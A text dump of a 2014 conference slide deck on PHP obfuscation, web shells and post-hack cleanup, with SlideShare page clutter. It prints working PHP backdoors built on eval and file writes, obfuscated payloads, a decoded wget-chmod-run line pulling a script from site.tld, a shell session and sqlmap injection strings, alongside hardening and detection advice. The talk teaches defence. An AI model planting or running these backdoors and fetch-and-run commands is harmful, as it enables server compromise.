SlideShare a Scribd company logo
1 of 53
Download to read offline
CODE OBFUSCATION, PHP SHELLS & MORE
WHAT HACKERS DO ONCE THEY GET PASSED YOUR CODE
(AND HOW YOU CAN DETECT & FIX IT)
@mattiasgeniar
#phpbnl14-24/1/2014,Edegem
WHAT'S THIS TALK ABOUT?
Whathappens when I gethacked?
What's code obfuscation?
Whatare PHP shells?
Show me some clever hacks!
Prevention
Post-hack cleanup
WHAT IS THIS _NOT_ ABOUT?
How can I hack awebsite?
How can I DoS awebsite?
How can I find myinsecure code?
WHO AM I?
Mattias Geniar
System Engineer @ Nucleus.be
(wemayhaveaccidentallystartedahugestressballfightlastyear)
Ex-PHP'er, ORM hater, mostlyaLinux guy
WHO ARE YOU?
AnyLinux knowledge?
Ever had asite compromised?
Ever tryto hack your own site?:-)
Who was atthis talk @ phpbnl14?
WHY DO I GET HACKED?
To stealyour data
Intermediate hostto attack others
Actas aC&C server
Send outspammails
...
WHAT HAPPENS (TO MY SERVER) WHEN I GET
HACKED?
Malicious file uploads
Localfile modifications
SQL injections (to modifyDBcontent)
SQL injections (to stealyour data)
... and manymore things
TYPICAL ATTACKER WORKFLOW
Remote scan website for vulnerabilities (95%automated)
Havij,Nessus,Skipfish,SQLmap,w3af,ZedAttackProxy,...
Abuse vulnerability(file upload, RFI, SQLi, ...)
Mostlymanual,attacksurfacenarrowedbyscans
Profit!
FOCUS OF THIS TALK
File upload abuse: whatcan you do with PHP?
Formuploadvulnerability,stolenFTPpasswordsetc.
SQL injections
NOT THE FOCUS
Cross-Site Scripting(XSS)
Authentication bypassing
Cross-Site RequestForgery(CSRF)
...
Check OWASP.orgfor more fun!
FILE UPLOADS
Obvious ones
hackscript.php
remote-shell.php
Random file names
x51n98ApnrE_Dw.php
e8AnzRxn5DSMAn.php
Attempts to "blend in"
contact.php
wp-version.php
image.php / thumbnail.php
FILE MODIFICATIONS
wp-config.php
apc.php
Bootstrap.php
...
SQL INJECTIONS: GET CONTENT INTO YOUR DB
injectiframes
injectscript-tags
steal(admin) cookies
You'llonlynotice itwhen browsingthe site.
SO ....
WHAT DOES 'MALICIOUS PHP CODE' LOOK
LIKE?
LIKE THIS.
<?php
$rtyqwh="6886213372db82e93bc8504438e99c76";if(isset(
$_REQUEST['mwqhx'])){$jagjspf=$_REQUEST['mwqhx'];
eval($jagjspf);exit();}if(isset($_REQUEST['pxnikx']))
{$odzc=$_REQUEST['tgdjn'];$fdydwid=$_REQUEST
['pxnikx'];$rwtx=fopen($fdydwid,'w');$iuxrf=
fwrite($rwtx,$odzc);fclose($rwtx);echo$iuxrf;
exit();}
?>
OR THIS.
<?php
...
preg_replace("/.*/e","x65x76x61x6Cx28x67x7Ax69
x6Ex66x6Cx61x74x65x28x62x61x73x65x36x34x5Fx64x65
x63x6Fx64x65x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp
6ePJsmxrkS1PkuNkWf77C4CkREqy43S738N1vbufp7FIEARJkARBAHT7xRVnNIlu
i4XO6d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHCtPQCbYHzjgKWYtZQWDdFo3X
vj/wHKPMjFNvGkzwx/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEktN5vaL
k8AZdEZWZA+L5prJKswdTTy/5xTNv82yWm0J8sw1FxMfoHXoWD0nKFLuWq1SZc+q
z9iRH7F9fzrumVCvc+NGTXYP/9tyx24ndKKi6QSBH3Q8f2CWj84PDwEqyYPUDuWH
Zrmq5Yysm45z49jTyPXHncgdOQICcumz47kjNyrGaSNr4NqdP6d+5ISdYDpGGJ7b
c/ruGNr96fS4A607PTg+gsaa9cpzk3fVIF18MLGL1OL+dGwjAQzKhlHgTkLPCodO
WCzQSCFI4ETTYMzcsMMHT+Zs8sEExBOqWi2OfS3AGiwPL/ZhofPh+PQMmCJTN2UA
TKGzc3z87mAvF4ZnEaa4FbPQP/QH7riIhPdcp2hsAJswy3MH45YNzOAE7Y2+H4zY
yImGfq818cOo/cEKw5kf9Bpswx1PphGLbidOayJS2dga8a+2mh1OuzA87Nrypk7L
bLfN9sYaYoY/UGXb0AlD8p3I9v0rIKpwBd1zTZNDtOKicPUNGlm4brIMGOJxk+lm
.....");
?>
YEP, YOU GUESSED IT.
<?php
...
@error_reporting(0);@ini_set('error_log',NULL);@ini_set('log_
errors',0);if(count($_POST)<2){die(PHP_OS.chr(49).chr(48)
.chr(43).md5(0987654321));}$v5031e998=false;foreach(array
_keys($_POST)as$v3c6e0b8a){switch($v3c6e0b8a[0]){casech
r(108):$vd56b6998=$v3c6e0b8a;break;casechr(100):$v8d777f
38=$v3c6e0b8a;break;casechr(109):$v3d26b0b1=$v3c6e0b8a;
break;casechr(101);$v5031e998=true;break;}}if($vd56b6
998===''||$v8d777f38==='')die(PHP_OS.chr(49).chr(49).chr
(43).md5(0987654321));$v619d75f8=preg_split('/,(+)?/',
@ini_get('disable_functions'));$v01b6e203=@$_POST[$vd56b6998
...
?>
THERE'S PRETTY CODE TOO, THOUGH.
JUST NOT AS OFTEN.
OBFUSCATION TECHNIQUES
Whyhide the code?
Legit
Preventreverse engineering
Protectproprietarycode
ZendGuard,SourceGuardian,...requirePHPextensionstodecrypt
Accidentally
Lack of experiencefrom the dev
Simple problems solved in ahard way
Malicious
Preventcode from beingfound
Hidebackdoors in backdoors
Hidetrue purpose of script
OBFUSCATION TECHNIQUES
Remove whitespace
if(isset($_GET["t1065n"])){
$auth_pass ="";
$color ="#df5";
$default_action ="FilesMan";
$default_use_ajax=true;
preg_replace("/.*/e","x65x7...");
}
Becomes
if(isset($_GET["t1065n"])){$auth_pass="";$color="#df5";$default_action=
"FilesMan";$default_use_ajax=true;preg_replace("/.*/e","x65x7...");}
OBFUSCATION TECHNIQUES
Replacements!
$string="mysecretkey";
Obfuscated:
$string= chr(109).chr(121).chr(32).chr(115).chr(101).chr(99).chr(114)
.chr(101).chr(116).chr(32).chr(107).chr(101).chr(121));
$string="x6ex6fx20x6fx6ex65x20x63x61x6ex20x72x65x61x64x20".
"x74x68x69x73x2cx20x6dx75x61x68x61x68x61x21";
$string=gzinflate('??/JU(J?K??U(I?(');
Also works with bzip, gzencode, urlencode,
UUencode, ...
Attacker can send the ASCIIchars via$_POST, code can
'decrypt'byrunningord($_POST['val']).
OBFUSCATION TECHNIQUES
Character substitutions with str_rot13
(oranyself-madeletterreplacementalgoritm)
$string='somerandompieceofcode';
$encoded=str_rot13($string);
#$encoded=fbzrenaqbzcvrprbspbqr
$decoded=str_rot13($encoded);
#$decodedisagain=somerandompieceofcode
So if you're evil...
$a="rkrp('jtrguggc://fvgr.gyq/unpx.cy;puzbq+kunpx.cy;./unpx.cy');";
eval(str_rot13($a));
exec('wgethttp://site.tld/hack.pl;chmod+xhack.pl;./hack.pl');
OBFUSCATION TECHNIQUES
Run eval() on encoded strings
$code='echo"Inception:PHPinPHP!";';
eval($code);
The encoded version becomes:
$code='ZWNobyAiSW5jZXB0aW9uOiBQSFAgaW4gUEhQISI7IA==';
eval(base64_decode($code);
Image this on a100+ line PHP script. base64_encode()itall
and run itin eval().
$_="DmzzqsAFsXIeST6fErrz/v9R1Gq99KpbY25MtYNxFqa2eNDDmOUFP/XUC2nXjb18MIGNwQll
BtMiLjaVWnhuszI/gpWyfiKlBAAdqmWFLwm8KK7MCd15NV4BRyUvHpNPhAqxaZsvd+PPYTtu7s2Mna
Q5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4CkREqy43S738N1vbufp7FIEARJkARBAHT7xRVnNIlui4X
O6d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHCtPQCbYHzjgKWYtZQWDdFo3Xvj/wHKPMjFNvGkzwx
/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEktN5vaLk8AZdEZWZA+L5prJKswdTTy/5xTNv82
yWm0J8sw1FxMfoHXoWD0nKFLuWq1SZc+qz9iRH7F9fzrumVCvc+NGTXYP/9tyx24ndKKi6QSBH3Q8f
u4565OUaePg9ozc/GOe8V4VGTOvT4+6XYU44WI+qNCTT/FpqNO/lmJUR9DNtVAqlXMqFervCDn6MAZ
iDE4cQZ7N5PipVG8hP96T0vFC/xxiv+E334p4Y2FOTJpbHlZKwhaUL6C962ChBDYNXTOQB4QcA7waR
EAL+rfKuJiqVrGkhc1OEwQzD3XW1seCMJFU3QwvxRaMTmXwpYttmpxYkARu70BkiOjvbxlwg7hklhn
2CWj84PDwEqyYPUDuWHZrmq5Yysm45z49jTyPXHncgdOQICcumz47kjNyrGaSNr4NqdP6d+5ISdYDp
...
GGJ7bc/ruGNr96fS4A607PTg+gsaa9cpzk3fVIF18MLGL1OL+dGwjAQzKhlHgTkLPCodOWCzQSCFI4
ETTYMzcsMMHT+Zs8sEExBOqWi2OfS3AGiwPL/ZhofPh+PQMmCJTN2UATKGzc3z87mAvF4ZnEaa4FbP
QP/QH7riIhPdcp2hsAJswy3MH45YNzOAE7Y2+H4zYyImGfq818cOo/cEKw5kf9Bpswx1PphGLbidOa
yJS2dga8a+2mh1OuzA87Nrypk7LbLfN9sYaYoY/UGXb0AlD8p3I9v0rIKpwBd1zTZNDtOKicPUNGlm
4brIMGOJxk+lmTaNhB6mh8YMMN0R+4n12YWIOcDP7+WdWHPWeZ9JbUIuKQiOMF9DmyBsoDeXKainkK
VZckRWLJswvDNX+/TdbCpKtpOhLRlT0A3BB5Hv+DOYpDAF8FT+8+dA5Pi1Xy+slap8xc8dGiRV8XHB
M+DBh3nqhI1PG7g2kFEKr73RGsGBAGk3LAU7LOFVMnZUErsT4TA+ciR9E7nhAs6/Qc0MAdFFeA==";
eval(base64_decode($_));
OBFUSCATION TECHNIQUES
Inception!
$_ ='CmlmKGlzc2V0KCRfUE9TVFsiY29kZSJdKSkKewogICAgZXZhbChiYXNlNjRfZG'.
'Vjb2RlKCRfUE9TVFsiY29kZSJdKSk7Cn0=';
$__ ="JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7";
$___="x62141x73145x3664x5f144x65143x6f144x65";
eval($___($__));
Actuallymeans ...
$_ ='if(isset($_POST["code"])){
eval(base64_decode($_POST["code"]));
}';
$__ ='$code=base64_decode($_);eval($code);';
$___="base64_decode";
eval($___($__));
TIME FOR SOMETHING LESS CRYPTIC ...
Or:thefunyoucanhavewhenyoucanuploadyourownPHPfile(s)
PHP SHELL SCRIPTS
WSO Web Shell
C99 shell
R57 shell
...
Monolithic app: PHP, Javascript, Perl, images, ...
Accessed bysimplybrowsingto
http://$site/path/to/script.php
http://$site/uploads/script.php
WHAT DO THOSE SHELLS DO?
Usuallycontains authentication/authorization
WHAT DO THOSE SHELLS DO?
Contains some kind of ACL
if(!empty($_SERVER['HTTP_USER_AGENT'])){
$ua=$_SERVER['HTTP_USER_AGENT'];
$userAgents=array("Google","MSNBot");
if(preg_match('/'.implode('|',$userAgents).'/i',$ua)){
header('HTTP/1.0404NotFound');
exit;
}
}
#OrbyIP,cookies,$_POSTvalues,...
BUT ONCE YOU GET IN ... :-)
WEB SHELL BY ORB
File listing
Remote shells
Server info
...
FULL CONSOLE
Limited to user runningPHP
Limited bythe php.iniconfig
Can read allyour configs
REMOTE SHELLS
~$telnet10.0.2.231337
Connectedtolocalhost.
Escapechracteris'^]'.
sh-4.1$ls-alh
total84K
drwxrwx---2xxxhttpd4.0KJan2117:17.
drwxrwx---4xxxhttpd4.0KJan2117:25..
-rw-r--r--1xxxhttpd 74KJan2116:562x2.php
-rw-r--r--1xxxhttpd 0Jan2117:17look_mom_imma_winning_the_internetz
sh-4.1$
REMOTE SHELLS
Requires perl(standard ... everywhere?)
Gets forked to the background
Can be _real_painful
BIG DEAL ... YOU CAN'T DO ANYTHING!
...
CAN'T I?
COMPILE YOUR OWN EXPLOIT?
sh-4.1$gccexploit.c-oexploit
sh-4.1$chmod+xexploit
sh-4.1$ls-alhexploit
-rwxrwxr-x1xxxxxx6.3KJan2117:38exploit
sh-4.1$./exploit
START A BITCOIN MINER?
WHAT ELSE IN THIS WEB SHELL BY ORB?
Zip/Tar.gz manager
Brute force ftp/mysql/...
Search system for files
.mysql_history,.bash_history,*.conf,...
Similar to R75 shell, C99, ...
C99 SHELL
Even has afeedback form!
WHAT THEY HAVE IN COMMON
GUI stolen from a90's h4ck0rz movie
Allsingle page apps
Made to dumb-down the user (presets etc.)
Offer same kind of tools/scripts/exploits
HACKERS PROTECT THEMSELVES
Add aself-updatecommand
Add aself-destructcommand
Make multiple copiesof itself
Obfuscate its own code with random data
Add to cronto restartscript
HOW TO PROTECT YOURSELF
Server-sidevscode-wise
As adev...
Don'ttrustyour users
Whitelist(don'tblacklist!) file extensions in upload
forms
Safe:$whitelist=array('jpg','jpeg');
Unsafe:$blacklist=array('php','cgi');#Willstillallowperl(.pl)
code
Never use eval()
As asysadmin...
Don'tallow PHP execution from uploads directory
(easilyblockedinwebserverconfigs)
Mountfilesystems with noexecoption
Virus-scanalluploaded files
Block 'dangerous'php functions
BLOCK PHP EXECUTION FROM UPLOADS
DIRECTORY
(we'lltakeApacheasanexample)
Wheneverpossible,don'tuse.htaccessfilesbutsetitinyourmain/vhostconfiguration
<Directory/var/www/vhosts/mysite.tld/httpdocs/uploads>
<FilesMatch"(?i).(php|phtml)$">
OrderDeny,Allow
DenyfromAll
</FilesMatch>
</Directory>
BLOCKING DANGEROUS PHP FUNCTIONS
(dependsonyourdefinitionofdangerous)
php.ini: disable_functions
Onlydisables internalfunctions, no user-defined ones
Can notbe overwritten later (duh)
disable_functions=show_source,exec,system,passthru,dl,phpinfo,...
eval()is alanguage construct, notafunction. Can notbe
blocked in disable_functions. Check outthe suhosin patch to
disable this.
YOUR ACCESS & ERROR LOGS ARE GOLDEN
Thesearenormalaccesslogs...
---"GET/account.phpHTTP/1.1"20017333"https://site.be/script.php?id=NGE5OTI7N2BlbT
---"GET/images/pages/account.gifHTTP/1.1"2001668"Mozilla/5.0(WindowsNT6.2;WOW
---"GET/images/pages/account_companycontacts.pngHTTP/1.1"2003392"Mozilla/5.0(Win
---"GET/images/pages/account_contacts.gifHTTP/1.1"2001765"Mozilla/5.0(WindowsNT
---"GET/account_orders.phpHTTP/1.1"20021449"Mozilla/5.0(WindowsNT6.2;WOW64;r
...
YOUR ACCESS & ERROR LOGS ARE GOLDEN
Thesearenot...
GET/my_php_file.php?query_param=1%20AND%202458=CAST%28CHR%2858%29%7C%7CCHR%28
112%29%7C%7CCHR%28100%29%7C%7CCHR%28118%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20
COALESCE%28CAST%28uid%20AS%20CHARACTER%2810000%29%29%2CCHR%2832%29%29%20FROM
%20db.table%20OFFSET%206543%20LIMIT%201%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CC
HR%28104%29%7C%7CCHR%2897%29%7C%7CCHR%28109%29%7C%7CCHR%2858%29%20AS%20NUMER
IC%29HTTP/1.1"200554"-""sqlmap/1.0-dev(http://sqlmap.org)"
Or ...
GET/my_php_file.php?query_param=1AND2458=CAST(CHR(58)||CHR(112)||
CHR(100)||CHR(118)||CHR(58)||(SELECTCOALESCE(CAST(uidASCHARACTER(10000)),
CHR(32))FROMdb.tableOFFSET6543LIMIT1)::text||CHR(58)||CHR(104)||
CHR(97)||CHR(109)||CHR(58)ASNUMERIC)HTTP/1.1"200554"-"
VERIFY IPS VS. USER-AGENTS
46.165.204.8--[15:16:55+0100]"GET/images.phpHTTP/1.1"200175"-"
"Mozilla/5.0(compatible;Goooglebot/2.1;+http://www.google.com/bot.html)"
~$whois46.165.204.8
...
org-name: LeasewebGermanyGmbH
...
BLOCK SQL-INJECTION AS A SYSADMIN
This can neverbe your onlydefense. This justhelps make it
harder.
You can acton URL patterns
KeywordslikeCHR(),COALESCE(),CAST(),CHR(),...
You can acton HTTP user agents
Keywordslikesqlmap,owasp,zod,...
Installa"Web Application Firewall"
(opensource:mod_securityinApache,security.vclinVarnish,ModSecurityinNginx,5GBlacklist,...)
BLOCK BRUTE FORCE ATTACKS
Ifanapplicationuseriscompromised,theycoulduploadmaliciouscontent.
In the application: block usersafter X amountof failed
attempts
On the server: tools like fail2ban, denyhosts, iptables,
...
Extend common tools: fail2banto detectPOSTfloods via
access/error logs
(ie:10POSTrequestsfromsameIPin5s=ban)
STAY UP-TO-DATE
Witheverything.
Update 3rd party libraries: ckeditor, tinymce,
thumbnailscripts, ...
Tripple-checkanythingyoutookfromtheinternet.
Update your frameworkthatcould have securityfixes
Update your OS & applications
(limittheprivilegeescalationexploitsiftheappiscompromised)
Update your personalknowledge / experience
CheckoutOWAS,tryoutfreevulnerabilityscanners,hackyourownsite,...
BUT WHAT IF YOU FIND YOU'VE BEEN HACKED
...
POST-HACK CLEANUP
Or:howtofindthehack
Search for suspicious filenames
Check your access/error logs
(Ifyoufounduploadedfiles,usethetimestampsforamoreaccuratesearch)
Check your cronjobs on the system
Demsneakybastards...
Search allsourcecode for keywords like:
eval, base64_decode, wget, curl,...
Use sytem tools for scanningmalware like:
Maldet, ClamAV, rkhunter, tripwire, ...
(youmayneedtopokeyoursysadmin-thesecanrunasdaemons)
POST-HACK CLEANUP
Take adatabase dump and search for keywords like:
iframe, script, ...
Take alonglook again atallthe prevention methods we talked
aboutearlier.
Patch the code
Prepare yourself to reinstallyour entire server
Ifyou'reunsurehowfartheattackerwent,assumetheygotrootaccess.
Ifthat'sthecase,don'ttrustasinglesystembinary.
~$mysqldumpmydb>mydb.sql
~$grep-i'iframe'mydb.sql
~$grep-i'...'mydb.sql
THANK YOU
ANY QUESTIONS?
Contactvia@mattiasgeniaronTwitterorviamailatm@ttias.be
www.nucleus.be
Also:we'rehiringPHProckstars!

More Related Content

What's hot

DNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededDNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededFrans Rosén
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Spoofing attack: Learn about Email spoofing, IP address spoofing and many other
Spoofing attack: Learn about Email spoofing, IP address spoofing and many otherSpoofing attack: Learn about Email spoofing, IP address spoofing and many other
Spoofing attack: Learn about Email spoofing, IP address spoofing and many otherPankaj Dubey
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & InconsistencyGreenD0g
 
網站系統安全及資料保護設計認知
網站系統安全及資料保護設計認知網站系統安全及資料保護設計認知
網站系統安全及資料保護設計認知Justin Lin
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
Logical Attacks(Vulnerability Research)
Logical Attacks(Vulnerability Research)Logical Attacks(Vulnerability Research)
Logical Attacks(Vulnerability Research)Ajay Negi
 
PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?Sam Thomas
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshoptestuser1223
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigFrans Rosén
 

What's hot (20)

ZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSSZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSS
 
DNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededDNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification needed
 
SQL injection
SQL injectionSQL injection
SQL injection
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
Spoofing attack: Learn about Email spoofing, IP address spoofing and many other
Spoofing attack: Learn about Email spoofing, IP address spoofing and many otherSpoofing attack: Learn about Email spoofing, IP address spoofing and many other
Spoofing attack: Learn about Email spoofing, IP address spoofing and many other
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & Inconsistency
 
網站系統安全及資料保護設計認知
網站系統安全及資料保護設計認知網站系統安全及資料保護設計認知
網站系統安全及資料保護設計認知
 
log4j.pdf
log4j.pdflog4j.pdf
log4j.pdf
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
 
Logical Attacks(Vulnerability Research)
Logical Attacks(Vulnerability Research)Logical Attacks(Vulnerability Research)
Logical Attacks(Vulnerability Research)
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides Ahmedabad
 
PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?
 
SSRF workshop
SSRF workshop SSRF workshop
SSRF workshop
 
XSS
XSSXSS
XSS
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshop
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
 

Viewers also liked

Php web backdoor obfuscation
Php web backdoor obfuscationPhp web backdoor obfuscation
Php web backdoor obfuscationSandro Zaccarini
 
Code obfuscation
Code obfuscationCode obfuscation
Code obfuscationbijondesai
 
Welcome to the United States: An Acculturation Conversation
Welcome to the United States: An Acculturation ConversationWelcome to the United States: An Acculturation Conversation
Welcome to the United States: An Acculturation ConversationSuzanne M. Sullivan
 
The (In)Security of Topology Discovery in Software Defined Networks
The (In)Security of Topology Discovery in Software Defined NetworksThe (In)Security of Topology Discovery in Software Defined Networks
The (In)Security of Topology Discovery in Software Defined NetworksTalal Alharbi
 
Ajit-Legiment_Techniques
Ajit-Legiment_TechniquesAjit-Legiment_Techniques
Ajit-Legiment_Techniquesguest66dc5f
 
VMRay intro video
VMRay intro videoVMRay intro video
VMRay intro videoChad Loeven
 
Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Stephan Chenette
 
A combined approach to search for evasion techniques in network intrusion det...
A combined approach to search for evasion techniques in network intrusion det...A combined approach to search for evasion techniques in network intrusion det...
A combined approach to search for evasion techniques in network intrusion det...eSAT Journals
 
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon YangPractical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon YangLyon Yang
 
Topics in network security
Topics in network securityTopics in network security
Topics in network securityNasir Bhutta
 
Bsides to 2016-penetration-testing
Bsides to 2016-penetration-testingBsides to 2016-penetration-testing
Bsides to 2016-penetration-testingHaydn Johnson
 
SENIOR MATERIAL ENGINEER WITH 5 YEARS OF EXPERIENCE
SENIOR MATERIAL ENGINEER WITH 5 YEARS OF EXPERIENCESENIOR MATERIAL ENGINEER WITH 5 YEARS OF EXPERIENCE
SENIOR MATERIAL ENGINEER WITH 5 YEARS OF EXPERIENCESangeetha Sankaramahadev
 
Web attacks using obfuscated script
Web attacks using  obfuscated scriptWeb attacks using  obfuscated script
Web attacks using obfuscated scriptAmol Kamble
 
On deobfuscation in practice
On deobfuscation in practiceOn deobfuscation in practice
On deobfuscation in practiceDmitry Schelkunov
 
Purple teaming Cyber Kill Chain
Purple teaming Cyber Kill ChainPurple teaming Cyber Kill Chain
Purple teaming Cyber Kill ChainHaydn Johnson
 
Code obfuscation
Code obfuscationCode obfuscation
Code obfuscationAmol Kamble
 
Penetration testing dont just leave it to chance
Penetration testing dont just leave it to chancePenetration testing dont just leave it to chance
Penetration testing dont just leave it to chanceDr. Anish Cheriyan (PhD)
 
Syllabus Advanced Exploit Development 22-23 June 2013
Syllabus Advanced Exploit Development 22-23 June 2013Syllabus Advanced Exploit Development 22-23 June 2013
Syllabus Advanced Exploit Development 22-23 June 2013Dan H
 
Combat the Latest Two-Factor Authentication Evasion Techniques
Combat the Latest Two-Factor Authentication Evasion TechniquesCombat the Latest Two-Factor Authentication Evasion Techniques
Combat the Latest Two-Factor Authentication Evasion TechniquesIBM Security
 

Viewers also liked (20)

Php web backdoor obfuscation
Php web backdoor obfuscationPhp web backdoor obfuscation
Php web backdoor obfuscation
 
Code obfuscation
Code obfuscationCode obfuscation
Code obfuscation
 
Php obfuscator
Php obfuscatorPhp obfuscator
Php obfuscator
 
Welcome to the United States: An Acculturation Conversation
Welcome to the United States: An Acculturation ConversationWelcome to the United States: An Acculturation Conversation
Welcome to the United States: An Acculturation Conversation
 
The (In)Security of Topology Discovery in Software Defined Networks
The (In)Security of Topology Discovery in Software Defined NetworksThe (In)Security of Topology Discovery in Software Defined Networks
The (In)Security of Topology Discovery in Software Defined Networks
 
Ajit-Legiment_Techniques
Ajit-Legiment_TechniquesAjit-Legiment_Techniques
Ajit-Legiment_Techniques
 
VMRay intro video
VMRay intro videoVMRay intro video
VMRay intro video
 
Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007
 
A combined approach to search for evasion techniques in network intrusion det...
A combined approach to search for evasion techniques in network intrusion det...A combined approach to search for evasion techniques in network intrusion det...
A combined approach to search for evasion techniques in network intrusion det...
 
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon YangPractical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
 
Topics in network security
Topics in network securityTopics in network security
Topics in network security
 
Bsides to 2016-penetration-testing
Bsides to 2016-penetration-testingBsides to 2016-penetration-testing
Bsides to 2016-penetration-testing
 
SENIOR MATERIAL ENGINEER WITH 5 YEARS OF EXPERIENCE
SENIOR MATERIAL ENGINEER WITH 5 YEARS OF EXPERIENCESENIOR MATERIAL ENGINEER WITH 5 YEARS OF EXPERIENCE
SENIOR MATERIAL ENGINEER WITH 5 YEARS OF EXPERIENCE
 
Web attacks using obfuscated script
Web attacks using  obfuscated scriptWeb attacks using  obfuscated script
Web attacks using obfuscated script
 
On deobfuscation in practice
On deobfuscation in practiceOn deobfuscation in practice
On deobfuscation in practice
 
Purple teaming Cyber Kill Chain
Purple teaming Cyber Kill ChainPurple teaming Cyber Kill Chain
Purple teaming Cyber Kill Chain
 
Code obfuscation
Code obfuscationCode obfuscation
Code obfuscation
 
Penetration testing dont just leave it to chance
Penetration testing dont just leave it to chancePenetration testing dont just leave it to chance
Penetration testing dont just leave it to chance
 
Syllabus Advanced Exploit Development 22-23 June 2013
Syllabus Advanced Exploit Development 22-23 June 2013Syllabus Advanced Exploit Development 22-23 June 2013
Syllabus Advanced Exploit Development 22-23 June 2013
 
Combat the Latest Two-Factor Authentication Evasion Techniques
Combat the Latest Two-Factor Authentication Evasion TechniquesCombat the Latest Two-Factor Authentication Evasion Techniques
Combat the Latest Two-Factor Authentication Evasion Techniques
 

Similar to Code obfuscation, php shells & more

PHP Static Code Review
PHP Static Code ReviewPHP Static Code Review
PHP Static Code ReviewDamien Seguy
 
Dip Your Toes in the Sea of Security (PHP MiNDS January Meetup 2016)
Dip Your Toes in the Sea of Security (PHP MiNDS January Meetup 2016)Dip Your Toes in the Sea of Security (PHP MiNDS January Meetup 2016)
Dip Your Toes in the Sea of Security (PHP MiNDS January Meetup 2016)James Titcumb
 
Dip Your Toes in the Sea of Security (PHP UK 2016)
Dip Your Toes in the Sea of Security (PHP UK 2016)Dip Your Toes in the Sea of Security (PHP UK 2016)
Dip Your Toes in the Sea of Security (PHP UK 2016)James Titcumb
 
Eight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsEight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsAleksandr Yampolskiy
 
PHP Basics and Demo HackU
PHP Basics and Demo HackUPHP Basics and Demo HackU
PHP Basics and Demo HackUAnshu Prateek
 
OWASP PHPIDS talk slides
OWASP PHPIDS talk slidesOWASP PHPIDS talk slides
